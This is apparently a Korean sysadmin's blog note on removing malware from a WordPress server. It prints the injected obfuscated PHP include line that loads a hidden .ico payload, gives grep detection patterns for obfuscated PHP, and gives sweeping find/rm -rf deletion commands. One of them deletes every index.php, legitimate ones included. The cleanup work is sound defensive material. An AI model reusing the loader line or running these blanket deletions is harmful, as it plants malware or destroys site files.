www-data index.php 파일이나
.2ec67e7e.ico 이런 ico 파일들이 생성된 경우, wordpress plugin 등에서 유입된 멀웨어를 의심해야한다.
워드프레스가 설치된 서버에는 전체적으로 적용되는 사안이다. 귀찬..
일단 원천봉쇄는 뒤로하고 파일들을 찾아서 제거하자.
index.php 의 내용은 이렇다.
<?php /*5693b*/ @include "\057ho\155e/.\144d5\0640e\0670.\151co"; /*5693b*/
unphp.net 에서 풀어보면.. ico파일 include하는 형태.. 만든놈 나가 죽었으면..
find -name index.php
find -name index.php -exec rm -rf {} \;
find -name “*.ico” | egrep ‘.[1-z]{8}.ico’
find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf
find -name “*.php” | egrep ‘\.[1-z]{8}.php’
find -name “*.php” | egrep ‘\.[1-z]{8}.php’ | xargs rm -rf
find . -type d -name ‘forum’
find . -type d -name ‘forum’ | xargs rm -rf
find . -type d -name ‘journal’
find . -type d -name ‘journal’ | xargs rm -rf
이런것들 찾아서 제거해주면 되겠는데 php 파일들은 날리기전에 체크한번씩 해보고..
엄한거 지우면 골치아프니까
find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *”
find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@include *”
find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *”
find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *( *base64_decode *( *”
find . -type f -name ‘*.php’ | xargs grep -l ” *base64_decode *”
find . -type f -name ‘*.php’ | xargs grep -l ” *function *wscandir *”
find . -type f -name ‘*.php’ | xargs grep -l ” *HTTP/1.0 *404 *Not *Found *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@gzuncompress *”
find . -type f -name ‘*.php’ | xargs grep -l ” *Array *( *) *; *global *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@unserialize *”
디렉토리 리스트
find . -maxdepth 1 -type d